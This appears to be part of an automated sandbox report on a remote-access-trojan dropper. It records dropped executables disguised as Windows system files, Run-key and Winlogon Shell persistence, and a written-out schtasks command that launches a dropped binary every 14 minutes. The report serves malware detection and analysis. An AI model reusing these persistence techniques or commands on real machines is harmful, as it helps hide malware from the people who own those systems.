                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, Qaas3LcbKU1PXAy0Tg.csHigh entropy of concatenated method names: 'nBSqVpFEX', 'qayV2nntS', 'Rb5kkk4OD', 'Jfu9xkHS5', 'mnQSeY7Eu', 'CLGtYK0wq', 'FIt1g6BXB', 'wooyggpDGhfhPRGFFkS', 'NDw7fPpbjMe6FThWwLD', 'PwpWRupXFG8PHehhJhe'
                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, hCsNyXJD5vKLl0WFlhC.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'lZ8T0s0OrX', 'TNCC7kYobG', 'RQmTC8heMW', 'YJYnkyLkR8JSRoAdO4W', 'HkH37AL6CwPcWAw6myF', 'if3eydL1Qd3QF2BGkBU', 'LQZlNqLj1TyrmWpJQQT', 'KotKdILMgTkTvcnLxuP'
                      Source: 1.3.Result.exe.2642c39.0.raw.unpack, p4VMiu79MPUyk8DkE6i.csHigh entropy of concatenated method names: 'JeMyXos1Mo', 'SdLyQPn7LQ', 'ybcyplpcur', 'xg3yh4a4jx', 'jBAyelkSal', 'p1oRIsunLidrkxQK4lU', 'tqgvr8uqijJEd8w7OMC', 'BhuM0PuU0kdmyxuA67K', 'HPuWJ2uvKlQgjmZ1RIm', 'ixw6K5u9fUIJHcUSbCg'

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeFile created: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Roaming\XClient.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Program Files\Uninstall Information\OfficeClickToRun.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeFile created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeJump to dropped file
                      Source: C:\Users\user\Desktop\ywXeiXEvP2.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Recovery\XClient.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Program Files (x86)\jDownloader\config\conhost.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exeFile created: C:\Users\user\AppData\Local\Temp\XClient.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeFile created: C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnkJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run sihost
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
                      Source: C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH
